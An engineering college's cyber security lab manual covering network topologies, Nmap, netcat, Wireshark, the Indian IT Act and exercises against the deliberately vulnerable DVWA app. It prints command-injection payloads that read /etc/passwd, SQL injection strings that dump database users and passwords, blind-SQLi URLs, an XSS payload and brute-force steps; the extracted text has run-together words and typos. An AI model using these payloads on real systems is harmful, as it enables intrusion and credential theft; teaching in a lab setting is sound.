You are on page 1of 87

Silver Oak College of Engineering &

Technology

GUJARAT TECHNOLOGICAL UNIVERSITY


BACHELOR OF ENGINEERING

CYBER SCEURITY
(3150714)

5th SEMESTER

COMPUTER ENGINEERING
y ManualLaborator
DEPARTMENT OF COMPUTER ENGINEERING
VISION

To be recognized for the quality education and research in the field of Computer Engineering known for
its accomplished graduates.

MISSION
1. Continually improve the standard of our graduates by engaging in innovative teaching learning
methods with high caliber motivated faculty members keeping in-line with the rapid
technological advancements.
2. Promote and support research activities over a wide range of academic interests among students
and staff for growth of individual knowledge and continuous learning.
3. Provide an education system that promotes innovation, creativity, entrepreneurial spirit,
leadership as well as freedom of thought with emphasis on professionalism and ethical behavior.

PROGRAM EDUCATIONAL OBJECTIVES (PEO):

PEO1: To provide fundamental knowledge of science and engineering for an IT professional and to
equip them with proficiency of mathematical foundations and algorithmic principles and inculcate
competent problem-solving ability.

PEO2: To implant ability in creativity & design of IT systems and transmit knowledge and skills
to analyze, design, test and implement various software applications.

PEO3: To exhibit leadership capability, triggering social and economical commitment and inculcate
community services.

PEO4: To inculcate professional-social ethics, teamwork in students and acquaint them with requisite
technical and managerial skills to attain a successful career.
PROGRAM OUTCOMES (POs)
Engineering Graduates will be able to:

1. Engineering knowledge: Apply the knowledge of mathematics, science, engineering


fundamentals, and an engineering specialization to the solution of complex engineering
problems.
2. Problem analysis: Identify, formulate, review research literature, and analyze complex
engineering problems reaching substantiated conclusions using first principles of mathematics,
natural sciences, and engineering sciences.
3. Design/development of solutions: Design solutions for complex engineering problems and
design system components or processes that meet the specified needs with appropriate
consideration for the public health and safety, and the cultural, societal, and environmental
considerations.
4. Conduct investigations of complex problems: Use research-based knowledge and research
methods including design of experiments, analysis and interpretation of data, and synthesis of the
information to provide valid conclusions.
5. Modern tool usage: Create, select, and apply appropriate techniques, resources, and modern
engineering and IT tools including prediction and modeling to complex engineering activities
with an understanding of the limitations.
6. The engineer and society: Apply reasoning informed by the contextual knowledge to assess
societal, health, safety, legal and cultural issues and the consequent responsibilities relevant to
the professional engineering practice.
7. Environment and sustainability: Understand the impact of the professional engineering
solutions in societal and environmental contexts, and demonstrate the knowledge of, and need for
sustainable development.
8. Ethics: Apply ethical principles and commit to professional ethics and responsibilities and norms
of the engineering practice.
9. Individual and team work: Function effectively as an individual, and as a member or leader in
diverse teams, and in multidisciplinary settings.
10. Communication: Communicate effectively on complex engineering activities with the
engineering community and with society at large, such as, being able to comprehend and write
effective reports and design documentation, make effective presentations, and give and receive
clear instructions.
11. Project management and finance: Demonstrate knowledge and understanding of the
engineering and management principles and apply these to one’s own work, as a member and
leader in a team, to manage projects and in multidisciplinary environments.
12. Life-long learning: Recognize the need for, and have the preparation and ability to engage in
independent and life-long learning in the broadest context of technological change.
CYBER SECURITY PRACTICAL BOOK DEPARTMENT OF

COMPUTER ENGINEERING PREFACE

It gives us immense pleasure to present the first edition of Cyber Security Practical Book for the
B.E. 3rd year students of Silver Oak College of Engineering and Technology.

The theory and laboratory course of Cyber Security, at Silver Oak College of Engineering and
Technology, Ahmedabad, is designed in such a manner that students can develop the basic
understanding of the subject during theory classes and gain the hands-on practical experience during
their laboratory sessions.

The Laboratory Manual presented here to you help you in understanding Topologies of network,,
security related network and understanding of different tools for different attacks on security. It also
take you in learning various hacking techniques. It will help you in learning Linux programming
which will be very useful programming language in Cyber Security.

Lab Manual Revised by: Prof. Shital Mehta, Silver Oak College of Engineering and Technology

Prof. Nirav Shah, Silver Oak College of Engineering and Technology

Prof. Hardika Menghani, Aditya Silver Oak Institute of Technology

Lab Manual Revision No.: SOCET_3150714_LM_2020_1


TABLE OF CONTENT

S
Practical T From
r Aim o
N
o
1 2
1 To study about Basic concepts of Computer Networks.
. (Devices, LAN, MAN & WAN)

2 To study about Network Topologies. 3 9


.
3 TCP Scanning using NMAP. 1 13
. 0
4 UDP Port Scanning Using NMAP. 1 16
. 4
5 TCP/UDP Connectivity using NETCAT. 1 20
. 7
2 27
6 Web Application Testing using DVWA. 1
.
2 36
7 SQL Injection using DVWA. 8
.
3 40
8 Analyze the Network Traffic using Wireshark. 7
.
4 54
9 The Practice of Web Application Penetration Testing. 1
.
5 64
1 Case Study on Indian IT ACT 2000. 5
0
.
PRACTICAL: 1

AIM: To study about Basic concepts of Computer Networks. (Devices, LAN, MAN & WAN, O.S)

Introduction

Local Area Network (LAN) –

LAN or Local Area Network connects network devices in such a way that personal computer and
workstations can share data, tools and programs. The group of computers and devices are connected
together by a switch, or stack of switches, using a private addressing scheme as defined by the TCP/IP
protocol. Private addresses are unique in relation to other computers on the local network. Routers are
found at the boundary of a LAN, connecting them to the larger WAN.
Data transmits at a very fast rate as the number of computers linked are limited. By definition, the
connections must be high speed and relatively inexpensive hardware (Such as hubs, network adapters
and Ethernet cables). LANs cover smaller geographical area (Size is limited to a few kilometres) and are
privately owned. One can use it for an office building, home, hospital, schools, etc. LAN is easy to design
and maintain. A Communication medium used for LAN has twisted pair cables and coaxial cables. It
covers a short distance, and so the error and noise are minimized.
Early LAN’s had data rates in the 4 to 16 Mbps range. Today, speeds are normally 100 or 1000 Mbps.
Propagation delay is very short in a LAN. The smallest LAN may only use two computers, while larger
LANs can accommodate thousands of computers. A LAN typically relies mostly on wired connections for
increased speed and security, but wireless connections can also be part of a LAN. The fault tolerance of
a LAN is more and there is less congestion in this network. For example: A bunch of students playing
Counter Strike in the same room (without internet).
Metropolitan Area Network (MAN) –

MAN, or Metropolitan area Network covers a larger area than that of a LAN and smaller area as
compared to WAN. It connects two or more computers that are apart but resides in the same or
different cities. It covers a large geographical area and may serve as an ISP (Internet Service Provider).
MAN is designed for customers who need a high-speed connectivity. Speeds of MAN ranges in terms of
Mbps. It’s hard to design and maintain a Metropolitan Area Network.

The fault tolerance of a MAN is less and also there is more congestion in the network. It is costly and
may or may not be owned by a single organization. The data transfer rate and the propagation delay of
MAN is moderate. Devices used for transmission of data through MAN are: Modem and Wire/Cable.
Examples of a MAN are the part of the telephone company network that can provide a high-speed DSL
line to the customer or the cable TV network in a city.
Wide Area Network (WAN) –

WAN or Wide Area Network is a computer network that extends over a large geographical area,
although it might be confined within the bounds of a state or country. A WAN could be a connection of
LAN connecting to other LAN’s via telephone lines and radio waves and may be limited to an enterprise
(a corporation or an organization) or accessible to the public. The technology is high speed and
relatively expensive.
There are two types of WAN: Switched WAN and Point-to-Point WAN. WAN is difficult to design and
maintain. Similar to a MAN, the fault tolerance of a WAN is less and there is more congestion in the
network. A Communication medium used for WAN is PSTN or Satellite Link. Due to long distance
transmission, the noise and error tend to be more in WAN.
WAN’s data rate is slow about a 10th LAN’s speed, since it involves increased distance and increased
number of servers and terminals etc. Speeds of WAN ranges from few kilobits per second (Kbps) to
megabits per second (Mbps). Propagation delay is one of the biggest problems faced here. Devices used
for transmission of data through WAN are: Optic wires, Microwaves and Satellites. Example of a
Switched WAN is the asynchronous transfer mode (ATM) network and Point-to-Point WAN is dial-up
line that connects a home computer to the Internet.
Os-:
An operating system (OS) is basically a collection of software that manages computer hardware
resources and provides common services for computer programs. Operating system is a crucial
component of the system software in a computer system. 
Network Operating System is one of the important type of operating system.
Network Operating System runs on a server and gives the server the capability to manage data, users,
groups, security, applications, and other networking functions. The basic purpose of the network
operating system is to allow shared file and printer access among multiple computers in a network,
typically a local area network (LAN), a private network or to other networks.
Some examples of network operating systems include Microsoft Windows Server 2003, Microsoft
Windows Server 2008, UNIX, Linux, Mac OS X, Novell NetWare, and BSD.

Advantages
● Centralized servers are highly stable.
● Security is server managed.
● Upgradation of new technologies and hardware can be easily integrated into the system.
● It is possible to remote access to servers from different locations and types of systems.

Disadvantages
● High cost of buying and running a server.
● Dependency on a central location for most operations.
● Regular maintenance and updates are required.
PRACTICAL: 2
AIM: To study about Network Topologies.
Network Topology
Computer network topology is the way various components of a network (like nodes, links,
peripherals, etc.) are arranged. Network topologies define the layout, virtual shape or structure of
network, not only physically but also logically. The way in which different systems and nodes are
connected and communicate with each other is determined by topology of the network. Topology can
be physical or logical.
Physical Topology is the physical layout of nodes, workstations and cables in the network; while
logical topology is the way information flows between different components.

Types of Physical Network Topologies:

● Bus Topology
● Star Topology
● Ring Topology
● Mesh Topology
● Tree Topology

1. Bus Topology

Bus Topology is the simple stofnetwork topologies. Inthistypeoftopology, allthenodes (computers as


well as servers) are connected to the single cable (called bus), by the help of interface connectors. This
central cable is the backbone of the network and is known as Bus (thus the name). Every workstation
communicates with the other device through this Bus.

A signal from the source is broadcasted and it travels to all workstations connected to bus cable.
Although the message is broadcasted but only the intended recipient, whose MAC address or IP
address matches, accepts it. If the MAC /IP address of machine doesn’t match with the intended
address, machine discards the signal.
Aterminatorisaddedat endsofthecentralcable, topreventbouncingofsignals. Abarrelconnector can be
used to extend it. Below I have given a basic diagram of a bus topology and then have discussed
advantages and disadvantages of Bus Network Topology.

Advantages of Bus Topology

● Easy to connect a computer or peripheral to a linear bus.


● Requires less cable length than a star topology.

Disadvantages of Bus Topology

● Entire network shuts down if there is a break in the main cable.


● Terminators are required at both ends of the backbone cable.
● Difficult to identify the problem if the entire network shutdown.
● Not meant to be used as a stand-alone solution
2. Star Topology

In Star topology, all the components of network are connected to the central device called “hub”
whichmaybeahub,arouteroraswitch.UnlikeBustopology(discussedearlier),wherenodeswere connected to
central cable, here all the workstations are connected to central device with a point-to- point
connection. So it can be said that every computer is indirectly connected to every other node by the
help of “hub”.
All the data on the star topology passes through the central device before reaching the intended
destination.HubactsasajunctiontoconnectdifferentnodespresentinStarNetwork,andatthesame
timeitmanagesandcontrolswholeofthenetwork.Dependingonwhichcentraldeviceisused,“hub”
canactasrepeaterorsignalbooster.Centraldevicecanalsocommunicatewithotherhubsofdifferent network.
Unshielded Twisted Pair (UTP) Ethernet cable is used to connect workstations to central node.

Advantages of Star Topology:

● Less damage in case of a single computer failure as it does not affect the entire network

Disadvantages of Star topology:

● Morecablesarerequiredtobeconnectedbecauseeachcomputerindividuallyconnectstothe central
server
● Single point of failure in case the server letdown.
3. Ring Topology

In Ring Topology, all the nodes are connected to each-other in such a way that they make a closed
loop. Each workstation is connected to two other components on either side, and it communicates with
these two adjacent neighbors. Data travels around the network, in one direction. Sending and receiving
of data takes place by the help of TOKEN.
Token passing (in brief): Token contains a piece of information which along with data is sent by the
source computer. This token then passes to next node, which checks if the signal is intended to it. If
yes, it receives it and passes the empty to into the network, otherwise passes token along with the data
to next node. This process continues until the signal reaches its intended destination. The nodes
with token are the ones only allowed to send data. Other nodes have to wait for an empty token to
reach them. This network is usually found in offices, schools and small buildings.

Advantages of Ring topology:

● Reducedchancesofdatacollisionaseachnodereleaseadatapacketafterreceivingthetoken.
● Token passing makes ring topology perform better than bus topology under heavy traffic
● No need of server to control connectivity among the nodes
● Equal access to the resources

Disadvantages of Ring topology:

● In Unidirectional Ring, a data packet must pass through all the nodes.
Ex:Let’ssayA,B,C,D,andEareapartoftheringnetwork.ThedataflowisfromAtowards
Bandhenceforth.Inthiscondition,ifEwantstosendapackettoD,thepacketmusttraverse the entire
network to reach.
● Single point of failure that means if a node goes down entire network goes down.

4. Mesh Topology
In a mesh network topology, each of the network node, computer and other devices, are
interconnectedwithoneanother.Everynodenotonlysendsitsownsignalsbutalsorelaysdatafrom other nodes.
In fact a true mesh topology is the one where every node is connected to every other node in the
network. This type of topology is very expensive as there are many redundant connections, thus it is
not mostly used in computer networks. It is commonly used in wireless networks. Flooding or routing
technique is used in mesh topology.

Types of Mesh Network topologies: -

a. Full Mesh Topology: - In this, like a true mesh, each component is connected to every other
component. Even after considering the redundancy factor and cost of this network, its main
advantage is that the network traffic can be redirected to other nodes if one of the nodes goes down.
Full mesh topology is used only for backbone networks.

b. PartialMeshTopology:-Thisisfarmorepracticalascomparedtofullmeshtopology.Here,some of the
systems are connected in similar fashion as in mesh topology while rests of the systems are
onlyconnectedto1or2devices.Itcanbesaidthatinpartialmesh,theworkstationsareindirectly connected to
other devices. This one is less costly and also reduces redundancy.

Advantages of mesh topology:

● Each connection can carry its own data load


● It is robust
● A fault is diagnosed easily
● Provides security and privacy

Disadvantages of mesh topology:

● Installation and configuration are difficult if the connectivity gets more


● Cabling cost is more and the most in case of a fully connected mesh topology
● Bulk wiring is required

5. Tree Topology

Tree Topology integrates the characteristics of Star and Bus Topology. Earlier we saw how in
PhysicalStarnetworkTopology,computers(nodes)areconnectedbyeachotherthroughcentralhub.

InTreeTopology,thenumberofStarnetworksareconnectedusingBus.Thismaincableseemslike a main stem


of a tree, and other star networks as the branches. It is also called Expanded Star Topology. Ethernet
protocol is commonly used in this type of topology. The diagram below will make it clear.

Advantages of tree topology:

● Scalable as leaf nodes can accommodate more nodes in the hierarchical chain.
● A point to point wiring to the central hub at each intermediate node of a tree topology
represents a node in the bus topology
● Other hierarchical networks are not affected if one of them gets damaged
● Easier maintenance and faultfinding

Disadvantages of tree topology:

● Huge cabling is needed


● A lot of maintenance is needed
● Backbone forms the point of failure.

6. Hybrid Topology

Hybrid, as the name suggests, is mixture of two different things. Similarly, in this type of topology we
integrate two or more different topologies to form a resultant topology which has good points
optimizing the available resources. Special care can be given to nodes where traffics high as well as
where chances of fault are high.
PRACTICAL: 3

AIM: TCP Scanning using NMAP.

Nmap is a tool used for port scanning. It scans the open ports in the target host.
Step 1: Install the nmap.exe.
Step 2: Start Nmap.
Following is the GUI of Nmap.

Put Screenshot of Nmap Home Screen:

Step 3: Set the IP address of the target


Step 4: Choose the scan type
Put Screenshot of Choose the scan:
Step 5:Click scan
Result Analysis
Nmap Output
Screenshot:
Ports:

Host Details:
PRACTICAL: 4

AIM: UDP Port Scanning Using NMAP.

Step 1: Install the nmap.exe.


Step 2: Start Nmap.
Following is the GUI of Nmap.
Put Screenshot of Nmap Home Screen:

Step 3: Set the IP address of the target


Step 4: Choose the scan type.
Put Screenshot of Choose the scan:

Step 5: Click scan


Result Analysis
Nmap Output:
Ports:
PRACTICAL: 5

AIM: TCP/UDP Connectivity using NETCAT.

netcat = net+cat.

It is cat command over the network. Mostly used for file transfer over the network. Learn basic
unix/linux commands to understand working of this tool.

Step 1: Install the ncat. Sometimes it comes with nmap package so check it before installing a fresh
package.

Step 2: Start ncat by going to ncat folder in cmd.

To show the TCP connection we need to maintain a client-server session

Step 3: Open two 'cmd' windows in administrator mode


Step 4: Goto the folder where ncat.exe is installed (in both the windows).
Step 5: Run the command: ncat.exe -l 4444
Here -l sets ncat to listen at port number 4444

Step 6: On the second cmd (client window) run the command: ncat.exe 127.0.0.1 4444

127.1.1.1 is the local ip address. The address of same PC, and 4444 is the port number where ncat is
listening. To practice the practical in the lab enter your neighbour's IP address, and choose any port
number greater than 1024.

Step 7: Now type the message which is to be sent on the server. As soon as you press the enter key, the
message is sent to the server and it is displayed on the server cmd window.
Step 8: Now the connection has made. To disconnect the connection press ctrl+c.

Step 9: To transfer any file type on the server side:

ncat.exe -l 4444 > input.txt

on the client window:

ncat.exe 127.0.0.1 4444 < output.txt


PRACTICAL: 6

AIM: Web Application Testing using DVWA.

Step 1: Install DVWA Tool.

Step 2: Login to DVWA.

Step 3: Set DVWA Security Level

1. Click on DVWA Security, in the left hand menu.

2.Select "low"

3.Click Submit
Step 4: Command Execution.

1. Click on Command Execution


Step 5: Execute Ping

1. Below we are going to do a simply ping test using the web interface.
2. As an example, ping something on your network.
3. Use the IP Address 192.168.1.106
4. Click Submit.
Attempt 1

1. 192.168.1.106; cat /etc/passwd


2. Click Submit
3. Notice that we are now able to see the contents of the /etc/passwd file
Step 6: Bring up a terminal window.

1. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php.
2. Notice the two shell_exec lines.
3. These are the lines that execute ping depending on which Operating System is being used.
4. In Unix/Linux command, you can run multiple command separated by a ";".
5. Notice the code does not check that if $target matches an IP Address
6. \d+.\d+.\d+.\d+, where "\d+" represents a number with the possibility of multiple digits, like
192.168.1.106.
7. The code allows for an attacker to append commands behind the IP Address. 8.
192.168.1.106; cat /etc/passwd
Step 7: Copy the /etc/passwd file to /tmp.

192.168.1.106; cat /etc/passwd | tee /tmp/passwd


PRACTICAL: 7

AIM: Manual SQL Injection using DVWA

Step 1: Install DVWA Tool

Step 2: Login to DVWA

Step 3: Select Security Level


Step 4: Select "SQL Injection" from the left navigation menu.
Step 5:

● Input the below text into the User ID Textbox (See Picture).
● %' or '0'='0 and click submit.
● In this scenario, we are saying display all record that are false and all records that are true.
● %' - Will probably not be equal to anything, and will be false.
● '0'='0' - Is equal to true, because 0 will always equal 0.
Step 6:
● Input the below text into the User ID Textbox (See Picture).
● %' or 0=0 union select null, version() #.
● Notice in the last displayed line, 5.1.60 is displayed in the surname.
● This is the version of the mysql database.
Step 7: Display Database User
● Input the below text into the User ID Textbox (See Picture).
● %' or 0=0 union select null, user() #
● Notice in the last displayed line, root@localhost is displayed in the surname.
● This is the name of the database user that executed the behind the scenes PHP code
Step 8: Display all tables in information schema
● Input the below text into the User ID Textbox (See Picture).
● %' and 1=0 union select null, table name from information_schema. tables #
● Click Submit
● Now we are displaying all the tables in the information schema database.
● The INFORMATION_SCHEMA is the information database, the place that stores information
about all the other databases that the MySQL server maintains.
Step 9: Display all the user tables in information schema.
● Input the below text into the User ID Textbox (See Picture).
● %' and 1=0 union select null, table name from information_schema.tables where table name
like 'user%'#
● Click Submit
● Now we are displaying all the tables that start with the prefix "user" in the information schema
database.

Step 10: Display all the columns fields in the information schema user table
● Input the below text into the User ID Textbox (See Picture).%' and 1=0 union select null,
concept(table_name,0x0a,column_name) from information_schema.columns where table name
= 'users' #
● Click Submit

● Now we are displaying all the columns in the users table.

● Notice there are a user_id, first name, last name, user and Password column.
Step 11: Display all the columns field contents in the information_schema user table
● Input the below text into the User ID Textbox (See Picture).
● %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #
● Click Submit
● Now we have successfully displayed all the necessary authentication information into this
database.
PRACTICAL: 8

AIM: Analyze the Network Traffic using Wireshark. (Network Sniffer)

A packet sniffer, sometimes referred to as a network monitor or network analyzer, can be used
byanetworkor system administrator to monitor and troubleshoot network traffic. Using the information
captured by the packet sniffer an administrator can identify erroneous packets and use the data to
pinpoint bottlenecks and help maintain efficient network data transmission.

In its simple form a packet sniffer simply captures all of the packets of data that pass through given
network interface. By placing packet sniffer on networking promiscuous mode, a malicious intruder
can capture and analyze all of the network traffic.

This is basically a network protocol analyzer –popular for providing the minutest details about your
network protocols, packet information, decryption etc. It can be used on Windows, Linux, OS X,
Solaris, FreeBSD, NetBSD, and many other systems. The information that is retrieved via this tool can
be viewed through a GUI, or the TTY-mode TShark utility. You can get your own free version of the
tool from here.

Download and install Wireshark network analyzer.

Steps to capture traffic:


1. Open Wiresharknetworkanalyzer
2.

Select interface: Got capture option in menu bar and select interface
3. Start Capturing
PRACTICAL: 9

Aim: The Practice of Web Application Penetration Testing.

1. Building Testing Environment

Intrusion of websites is illegal in many countries, so you cannot take other’s web sites as your testing
target.
First, you need build a test environment for yourself. If you are not good at building servers, we
recommend you build a simple one with XAMPP.
OS: Windows 7, 8
Software: XAMPP for Windows, download:
https://www.apachefriends.org/zh_cn/index.html

XAMPP for Windows has modules such as Apache, PHP, Tomcat, and MySQL etc. The default
installation path is c:\xampp, please do not change it.
Take DVWA (Damn Vulnerable Web Application) as an example, Start Apache and MySQL, and
access with http://127.0.0.1 .
After started, you can use the following command to set the password to 123456 (This is a weak
password, just for example, please modify it)
C:\xampp\mysql\bin\mysqladmin -u root password 123456
Now, you can download DVWA from https://github.com/RandomStorm/DVWA , unzip it to
C:\xampp\htdocs\dvwa,
Then modify its configuration file, which is
C:\xampp\htdocs\dvwa\config\config.inc.php:
$_DVWA[ 'db_server' ] = 'localhost';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root'
$_DVWA[ 'db_password' ] = ‘123456’;
$_DVWA['default_security_level']=" low";
Open http://127.0.0.1/dvwa/setup.php
Click” Create/Reset Database” to finish the installation.
Access the front page of it and it will redirect to
http://127.0.0.1/DVWA/login.php
Now, a basic test environment is available.
2. DVWA Brute Force
The first challenge of DVWA is how to login it. Usually, you can search the network and get the
default username/password, or try to use SQL Injection to escape the authentication mechanism, such
as use a username like admin’;-- or other ways.
Here we will use brute force, and use WebCruiser Web Vulnerability Scanner 3
(http://www.janusec.com/ ) as a brute force tool.
First, input any username and password, such as 123, 456, etc. submit.

Switch to Resend tab:


We found there was a request list which includes requests we submit just now. Note that there is a
button “Bruter”, click it, it will switch to Bruter tool.
The username and password field has been identified automatically.
The dictionary files are located in the same directory with WebCruiserWVS.exe and supports custom
modifying.

Click “Go” to start guess process, result will be list in the window.
Log in with the username and password.
3. SQL Injection
Select “SQL Injection” menu, input 1 and submit:
Input 1’ to try:

MySQL throw exception because of unpaired single quotes.


Now, we can suspect that there is SQL Injection vulnerability here. Continue try 1 and 1=1 and 1 and
1=2

But we found it is not the same as expected, SQL Injection with integer type was ruled out. Continue try
with 1' and '1'='1 and 1' and '1'='2
There is no result return to us when we input 1’ and ‘1’=’2

Till now, we can adjudge there is SQL Injection vulnerability with string type here. Recap:
Criterion of SQL Injection
Assume the initial response is Response0, Response by append true logic is Response1, Response by
append false logic is Response2,
If Response1= Response0, but Response1! = Response2, SQL Injection exists. OK, can you takeover
some data by exploiting it?
Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select
count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group by
x)a)%23

Well, the database name “dvwa” returns on the page.


This case is a little complex; actually it builds an exception intentionally by twice rand
computation.
Another way is blind SQL Injection, by guest the length and ASCII of each byte of the field. To
compute if the length of database name bigger than 10: http://127.0.0.1/dvwa/vulnerabilities/sqli/?
Submit=Submit&id=1' and (select char_length(database()))>10 and '1'='1

Right, continue guess till: http://127.0.0.1/dvwa/vulnerabilities/sqli/?


Submit=Submit&id=1' and (select char_length(database()))=4 and '1'='1

We got the length is 4.


Continue to guess each byte of it: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1'
and (select ord(substr(database(),1,1)) )=100 and %271%27=%271
The ASCII of the first byte is 100, it is d, and so on.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
sord(substr(database(),2,1)) )=118 and %271%27=%271 , the second byte is v .
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
ord(substr(database(),3,1)) )=119 and %271%27=%271 ,the third byte is w .
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select

ord(substr(database(),4,1)) )=97 and %271%27=%271 ,the fourth byte is a . Got the full name of
database is “dvwa” .
Is there a tool which can do these tests instead?
Yes, we can use a web application security scanner to do it.
Take WebCruiser as an illustration, navigate page and click “ScanURL”:
SQL Injection vulnerabilities found. Right click vulnerability and select “SQL INJECTION POC”,
Continue click ”Get Environment Information”:
4. XSS
Select XSS from the menu, http://127.0.0.1/dvwa/vulnerabilities/xss_s/

Input text and script directly in the title and content field, such as:
testinput<img src=0 onerror="alert(123456)"> Or use scanner, it found 2 XSS vulnerabilities.
Note: In order to improve efficiency, WebCruiser Web Vulnerability Scanner can scan designated
vulnerability type (setting) or designated URL (ScanURL button) separately.
PRACTICAL: 10

AIM: Case Study on Indian IT ACT 2000.

An Act to provide legal recognition for transactions carried out by means of electronic data interchange
and other means of electronic communication, commonly referred to as "electronic commerce", which
involve the use of alternatives to paper-based methods of communication and storage of information, to
facilitate electronic filing of documents with the Government agencies.

Some IT Acts with section are described below.

43. Penalty for damage to computer, computer system, etc.

If any person without permission of the owner or any other person who is in charge of a computer,
computer system or computer network, —

(a) Accesses or secures access to such computer, computer system or computer network;

(b) Downloads, copies or extracts any data, computer data base or information from such computer,
computersystemorcomputernetworkincludinginformationordataheldorstoredinanyremovable storage
medium;

(c) Introduces or causes to be introduced any computer contaminant or computer virus into any
computer, computer system or computer network;

(d) damages or causes to be damaged any computer, computer system or computer network, data,
computer data base or any other programmer residing in such computer, computer system or computer
network;

(e) Disrupts or causes disruption of any computer, computer system or computer network;

(f) Denies or causes the denial of access to any person authorized to access any computer, computer
system or computer network by any means;
(g) providesanyassistancetoanypersontofacilitateaccesstoacomputer,computersystemor
computer network in contravention of the provisions of this Act, rules or regulations made thereunder;

(h) chargestheservicesavailedofbyapersontotheaccountofanotherpersonbytamperingwithor
manipulatinganycomputer,computersystem,orcomputernetwork,heshallbeliabletopaydamages by way
of compensation not exceeding one crore rupees to the person so affected. Explanation.- For the
purposes of this section,—

(i) "Computer contaminant" means any set of computer instructions that are designed—

(a) To modify, destroy, record, transmit data or Programmed residing within a computer, computer
system or computer network; or

(b) By any means to usurp the normal operation of the computer, computer system, or computer
network;

(ii) "computer data base" means a representation of information, knowledge, facts, concepts or
instructionsintext,image,audio,videothatarebeingpreparedorhavebeenpreparedinaformalized manner or
have been produced by a computer, computer system or computer network and are intended for use in
a computer, computer system or computer network;

(iii) "computervirus"meansanycomputerinstruction,information,dataorProgrammethatdestroys,
damages, degrades or adversely affects the performance of a computer resource or attaches itself to
another computer resource and operates when a Programmed, data or instruction is executed or some
other event takes place in that computer resource;

(iv) "Damage" means to destroy, alter, delete, add, modify or rearrange any computer resource by any
means.

44. Penalty for failure to furnish information returned.

If any person who is required under this Act or any rules or regulations made thereunder to—

(a) furnishanydocument,returnorreporttotheControlleror?heCertifyingAuthorityfailstofurnish
the same, he shall be liable to a penalty not exceeding one lakh and fifty thousand rupees for each such
failure;

(b) File any return or furnish any information, books or other documents within the time specified
therefor in the regulations fails to file return or furnish the same within the time specified therefore
theregulations,heshallbeliabletoapenaltynotexceedingfivethousandrupeesforeverydayduring which such
failure continues;

(c) Maintain books of account or records, fails to maintain the same, he shall be liable to a penalty not
exceeding ten thousand rupees for every day during which the failure continues.

52. Salary, allowances and other terms and conditions of service of Presiding Officer.

The salary and allowances payable to, and the other terms and conditions of service including pension,
gratuity and other retirement benefits of. The Presiding Officer of Cyber Appellate Tribunal shall be
such as may be prescribed: Provided that neither the salary and allowances nor the other terms and
conditions of service of the Presiding Officer shall be varied to his disadvantage after appointment.

61. Civil court not to have jurisdiction.

No court shall have jurisdiction to entertain any suit or proceeding in respect of any matter which an
adjudicating officer appointed under this Act or the Cyber Appellate Tribunal constituted under this
Act is empowered by or under this Act to determine and no injunction shall be granted by any court or
other authority in respect of any action taken or to be taken in pursuance of any power conferred by or
under this Act.

62. Appeal to HighCourt.

Any person aggrieved by any decision or order of the Cyber Appellate Tribunal may file an appeal to
the High Court within sixty days from the date of communication of the decision or order of the Cyber
Appellate Tribunal to him on any question of fact or law arising out of such order Provided that the
High Court may, if it is satisfied that the appellant was prevented by sufficient cause from
filingtheappealwithinthesaidperiod,allowittobefiledwithinafurtherperiodnotexceedingsixty
days.

64. Recovery of penalty

ApenaltyimposedunderthisAct,ifitisnotpaid,shallberecoveredasanarrearoflandrevenueand
thelicenseortheDigitalSignatureCertificate,asthecasemaybe,shallbesuspendedtillthepenalty is paid.

65. Tampering with computer source documents.

Who ever knowing lyorintentionallyconceals,destroysoraltersorintentionallyorknowinglycauses another


to conceal, destroy or alter any computer source code used for a computer, computer
Programme,computersystemorcomputernetwork,whenthecomputersourcecodeisrequiredtobe kept or
maintained by law for the time being in force, shall be punishable with imprisonment up to three years,
or with fine which may extend up to two lakh rupees, or with both.

Explanation.—for the purposes of this section, "computer source code" means the

Listingofprogrammer,computercommands,designandlayoutandProgrammeanalysisofcomputer resource
in any form.

66. Hacking with computer system.

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to
the public or any person destroys or deletes or alters any information residing in a computer resource or
diminishes its value or utility or affects it injuriously by any means, commit shack:

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine
which may extend up to two lakh rupees, or with both.

67. Publishing of information which is obscene in electronic form.

Whoever publishes or transmits or causes to be published in the electronic form, any material which
islasciviousorappealstotheprurientinterestorifitseffectissuchastotendtodepraveandcorrupt
personswhoarelikely,havingregardtoallrelevantcircumstances,toread,seeorhearthematter
contained or embodied in it, shall be punished on first conviction with imprisonment of either
description for a term which may extend to five years and with fine which may extend to one lakh
rupeesandintheeventofasecondorsubsequentconvictionwithimprisonmentofeitherdescription for a term
which may extend to ten years and also with fine which may extend to two lakh rupees.

68. Power of Controller to give directions.

(1) TheControllermay,byorder,directaCertifyingAuthorityoranyemployeeofsuchAuthorityto
takesuchmeasuresorceasecarryingonsuchactivitiesasspecifiedintheorderifthosearenecessary to ensure
compliance with the provisions of this Act, rules or any regulations made thereunder.

(2) Anypersonwhofailstocomplywithanyorderundersub-section(1)shallbeguiltyofanoffence and shall be


liable on conviction to imprisonment for a term not exceeding three years or to a Fine not exceeding
two lakh rupees or tooth.

69. Directions of Controller to a subscriber to extend facilities to decrypt information.

(1) If the Controller is satisfied that it is necessary or expedient so to do in the interest of the
sovereignty or integrity of India, the security of the State, friendly relations with foreign Stales or

public order or for preventing incitement to the commission of any cognizable offence, for reasons
toberecordedinwriting,byorder,directanyagencyoftheGovernmenttointerceptanyinformation transmitted
through any computer resource.

(2) The subscriber or any person in charge of the computer resource shall, when called upon by any
agencywhichhasbeendirectedundersub-section(1),extendallfacilitiesandtechnicalassistanceto decrypt
the information.

70. Protected system.

(1) The appropriate Government may, by notification in the Official Gazette, declare that any
computer, computer system or computer network to be a protected system.

(2) The appropriate Government may, by order in writing, authorize the persons who reauthorized
to access protected systems notified under sub-section (1).

(3) Anypersonwhosecuresaccessorattemptstosecureaccesstoaprotectedsystemincontravention of the


provisions of this section shall be punished with imprisonment of either description for a term which
may extend to ten years and shall also be liable to fine.

71. Penalty for misrepresentation.

